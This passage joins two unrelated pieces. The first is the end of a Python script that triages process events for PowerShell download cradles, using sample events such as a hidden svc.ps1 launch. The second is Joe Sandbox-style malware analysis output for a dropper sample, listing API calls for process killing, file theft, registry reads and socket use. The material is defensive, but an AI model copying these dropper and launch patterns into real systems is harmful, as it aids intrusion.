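     "parent_image": r"C:\ProgramData\update.exe",
     "command_line": f'"{PS_WOW64}" -nop -c "& \'C:\\ProgramData\\svc.ps1\'"'},
]

if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        print(v.pid, v.label, ",".join(v.indicators), v.url or "")
```

Only the first sample event carries both iex and the WebClient download and is labelled as the cradle, with its URL extracted; the fourth event, a .ps1 under C:\ProgramData\ started with -nop -c from a parent in ProgramData, has no download but enough co-occurring fragments to surface as suspicious. A 32-bit powershell.exe from SysWOW64 on a 64-bit host is itself worth a hunt, since that path is what a 32-bit dropper such as this sample resolves to.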
APIs
• _ValidateLocalCookies.LIBCMT ref: 6CD63A57
• ___except_validate_context_record.LIBVCRUNTIME ref: 6CD63A5F
• _ValidateLocalCookies.LIBCMT ref: 6CD63AE8
• __IsNonwritableInCurrentImage.LIBCMT ref: 6CD63B13
• _ValidateLocalCookies.LIBCMT ref: 6CD63B68
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 734f88ae84928aa4bc25df349bbd2e5c93125aff60047da9e58f19eba61f3891
• Instruction ID: 351296bd1124951ffe37b5a25a2d5dee50b4681c3a97b87733b4cdc621a4ad06
• Opcode Fuzzy Hash: 734f88ae84928aa4bc25df349bbd2e5c93125aff60047da9e58f19eba61f3891
• Instruction Fuzzy Hash: 61417134A01258EFCF00CF6AC890ADEBBB5AF45318F14815AE9159BF61D731DA19CFA0
APIs
• lstrcatA.KERNEL32(?,?,00000000,?), ref: 00FF6063
  • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
• lstrcatA.KERNEL32(?,00000000), ref: 00FF6080
• lstrcatA.KERNEL32(?,?), ref: 00FF609F
• lstrcatA.KERNEL32(?,?), ref: 00FF60B3
• lstrcatA.KERNEL32(?), ref: 00FF60C6
• lstrcatA.KERNEL32(?,?), ref: 00FF60DA
• lstrcatA.KERNEL32(?), ref: 00FF60ED
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF1FB5: GetFileAttributesA.KERNEL32(?,?,?,00FEDC33,?,?,?), ref: 00FF1FBC
  • Part of subcall function 00FF5CE8: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00FF5D0D
  • Part of subcall function 00FF5CE8: HeapAlloc.KERNEL32(00000000), ref: 00FF5D14
  • Part of subcall function 00FF5CE8: wsprintfA.USER32 ref: 00FF5D2D
  • Part of subcall function 00FF5CE8: FindFirstFileA.KERNEL32(?,?), ref: 00FF5D44
  • Part of subcall function 00FF5CE8: StrCmpCA.SHLWAPI(?,01015A80), ref: 00FF5D65
  • Part of subcall function 00FF5CE8: StrCmpCA.SHLWAPI(?,01015A84), ref: 00FF5D7F
  • Part of subcall function 00FF5CE8: wsprintfA.USER32 ref: 00FF5DA6
  • Part of subcall function 00FF5CE8: CopyFileA.KERNEL32(?,?,00000001), ref: 00FF5E63
  • Part of subcall function 00FF5CE8: DeleteFileA.KERNEL32(?), ref: 00FF5E86
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1546541418-0
                                                                                                                                                                                                                                                          • Opcode ID: 7df4cadde2e939801d587a455067e8f128d6d8439723736cf1389152f1ac7896
                                                                                                                                                                                                                                                          • Instruction ID: 097db5042e005457472e1ccc40ba673832dd93cf869383100440e893bdb5f5d3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7df4cadde2e939801d587a455067e8f128d6d8439723736cf1389152f1ac7896
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F051EAB1A0011C9FCB64DB64DC89ADDB7B9BB5C310F8044E6E709E3254EA34AB89DF54
APIs
• FreeLibrary.KERNEL32(00000000,?,6CD685DE,00000000,6CD65DDF,00000000,00000000,00000001,?,6CD68757,00000022,FlsSetValue,6CDAEF80,6CDAEF88,00000000), ref: 6CD68590
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: d4f8080c1c397432294b326b387f9b98cc97df787982153d01f5d966fd636033
• Instruction ID: b3eee63936de1b5d57023cb5af5a7bd74e750123298ecb68a9d43dc701cd61e2
• Opcode Fuzzy Hash: d4f8080c1c397432294b326b387f9b98cc97df787982153d01f5d966fd636033
• Instruction Fuzzy Hash: 3721C671A01251EBEB119B67CC54A8A377CAB437A8F240617EB15A7EA0D730EA05C7E1
APIs
• WSASocketW.WS2_32(00000002,6CD52BD4,00000000,00000000,00000000,00000081), ref: 6CD50F0C
• WSAGetLastError.WS2_32(?,6CD52BD4,?,8B04B87D,00000001,?,?,?,?,?,00000004,?,6CD1BF6E,?,00000004), ref: 6CD50F24
• WSASocketW.WS2_32(00000002,6CD52BD4,00000000,00000000,00000000,00000001), ref: 6CD50F42
• SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,6CD52BD4,?,8B04B87D,00000001,?,?,?,?,?,00000004,?,6CD1BF6E), ref: 6CD50F54
• WSAGetLastError.WS2_32(?,6CD52BD4,?,8B04B87D,00000001,?,?,?,?,?,00000004,?,6CD1BF6E,?,00000004), ref: 6CD50F6B
• GetLastError.KERNEL32(?,6CD52BD4,?,8B04B87D,00000001,?,?,?,?,?,00000004,?,6CD1BF6E,?,00000004), ref: 6CD50F7C
• closesocket.WS2_32(00000000), ref: 6CD50F8C
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: ErrorLast$Socket$HandleInformationclosesocket
• String ID:
• API String ID: 3114377017-0
• Opcode ID: f33a1d614218dc49c0a21fcab5106b62d4ebc46593e0e968a7ee9be7b2a37d7b
• Instruction ID: 9cf209f56bc9e359660d149dbfe8dccc663dae82997ce7c1dccf84536711906e
• Opcode Fuzzy Hash: f33a1d614218dc49c0a21fcab5106b62d4ebc46593e0e968a7ee9be7b2a37d7b
• Instruction Fuzzy Hash: B111B970244780EBFF214F24CD49B167BF8EB42B54F604519FA99DBAD0D7B5E4408720
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Name::operator+$NameName::
• String ID: throw(
• API String ID: 168861036-3159766648
• Opcode ID: 34961059821d3457211304a6bf64834a3401218a89d7f7b21d83fefc4cbc93e6
• Instruction ID: 73d97f1d5731a25c4019d555bef878b19da05f93455e2cbfb5de93f9464604d8
• Opcode Fuzzy Hash: 34961059821d3457211304a6bf64834a3401218a89d7f7b21d83fefc4cbc93e6
• Instruction Fuzzy Hash: 0A016D31A0020DAECF14DFA4DC92DBE3BB5EF44704F044068F6059B2A5DA789949AB84
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,10000000), ref: 00FF2AAB
• Process32First.KERNEL32(00000000,00000128), ref: 00FF2ABF
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FF2AE5
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00FF2AF4
• CloseHandle.KERNEL32(00000000), ref: 00FF2AFB
• Process32Next.KERNEL32(?,00000128), ref: 00FF2B0E
• CloseHandle.KERNEL32(?), ref: 00FF2B1E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2696918072-0
                                                                                                                                                                                                                                                          • Opcode ID: 1f0e42c58fdc2b826cfc74297cd8eff8c3e4b27ba501be96d8ab1b2a04c4e758
                                                                                                                                                                                                                                                          • Instruction ID: 9b678a1a7a0f5b75f1eac2b685280e8df88bb8bd69fd4f6d8be6250c03c798bc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f0e42c58fdc2b826cfc74297cd8eff8c3e4b27ba501be96d8ab1b2a04c4e758
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D11393090122DAFDF719F60AD5ABE97BB5BF08711F0040A9EB05A6194DB75AB80DF90
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: strtok_s
• String ID:
• API String ID: 3330995566-0
• Opcode ID: f8689e4b1ecdbb16ffd98a97269be17d09f94b28f505f4c78383cda9b3df0136
• Instruction ID: ae6162adb9378a257fc5732fcb194bd13cb709ab55c7ce3470763ffc476e2da3
• Opcode Fuzzy Hash: f8689e4b1ecdbb16ffd98a97269be17d09f94b28f505f4c78383cda9b3df0136
• Instruction Fuzzy Hash: C931AE72E0010A9FCB25DF24DC85B79BBA8FF48715F194059EE06DB066D778CB01AB40
APIs
• _memset.LIBCMT ref: 00FF5881
• RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,00000000,?), ref: 00FF58A1
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 00FF58C7
• RegCloseKey.ADVAPI32(?), ref: 00FF58D3
• lstrcatA.KERNEL32(?,?), ref: 00FF5902
• lstrcatA.KERNEL32(?), ref: 00FF5915
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3891774339-0
                                                                                                                                                                                                                                                          • Opcode ID: 2a541586507085f8daf411474eecea4361142c833f44d289b32bff6dfaabe27f
                                                                                                                                                                                                                                                          • Instruction ID: edaf913e233a74cf327803a1017c62f3ca9cb13d7ae048540f62c4483fc618d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a541586507085f8daf411474eecea4361142c833f44d289b32bff6dfaabe27f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8941797288001D9FDF25EF64EC8AAFA77B9FF18304F5004A5A308E3151DA755E859F90
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,?,6CD63C01,6CD60FD3,6CD60A3B,?,6CD60C73,?,00000001,?,?,00000001,?,6CDB5760,0000000C,6CD60D6C), ref: 6CD63E3D
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CD63E4B
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CD63E64
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6CD60C73,?,00000001,?,?,00000001,?,6CDB5760,0000000C,6CD60D6C,?,00000001,?), ref: 6CD63EB6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: 0d0183f1dd84654eeb05d9324e31bab871d77247b16e8725257d5bf2d5b5892e
                                                                                                                                                                                                                                                          • Instruction ID: 963056f5ccb746f80c91bf09eb794d99bf9822c3e93062f8e37ff86117518ffd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d0183f1dd84654eeb05d9324e31bab871d77247b16e8725257d5bf2d5b5892e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC01B972609611AFFB1517779C845963678DB022B8F30032AE76182DF1FB62C845D1B4
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 6CD4C4D5, 6CD4C513
                                                                                                                                                                                                                                                          • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 6CD4C4F2, 6CD4C534
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: freeaddrinfo
                                                                                                                                                                                                                                                          • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                                                                                                                                                                                                                                                          • API String ID: 2731292433-3544120690
                                                                                                                                                                                                                                                          • Opcode ID: 8222ee71e3350112e9c28b2fdb61448f53b41496f84f195cc40417c063e4c1eb
                                                                                                                                                                                                                                                          • Instruction ID: ce88e479776b424b5d77281c0b5fe6b471131837c37082c6719780f57bc91c57
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8222ee71e3350112e9c28b2fdb61448f53b41496f84f195cc40417c063e4c1eb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CD166B5D00218CFDB18DF89D480AADBBB1FF88314F15816EE8096B7A1D7719949CFA4
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(FFFFFFF4,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6CD4B575,?), ref: 6CD512E7
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,6CD4B575,?), ref: 6CD512F6
                                                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(00000000,?), ref: 6CD5133A
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,6CDAA3E8,6CDAB3D4,?,6CD4981A,6CDAB3C4), ref: 6CD515CA
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • called `Result::unwrap()` on an `Err` value, xrefs: 6CD5157D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Handle$CloseConsoleErrorLastMode
                                                                                                                                                                                                                                                          • String ID: called `Result::unwrap()` on an `Err` value
                                                                                                                                                                                                                                                          • API String ID: 1170577072-2333694755
                                                                                                                                                                                                                                                          • Opcode ID: 61ba6c8187d4428885be510c74529d466003763ba48f85dab5890585fbbc7fd9
                                                                                                                                                                                                                                                          • Instruction ID: 40e1c682a10c209bb58537a27add6912e4fd08ef61bc0dcff3d536ed116b3afe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61ba6c8187d4428885be510c74529d466003763ba48f85dab5890585fbbc7fd9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A391DFB0D04248EBEF00CF94D890BEEBFB4AF06308F448549E855ABBA1D774D955CBA1
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 00FF2D53
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
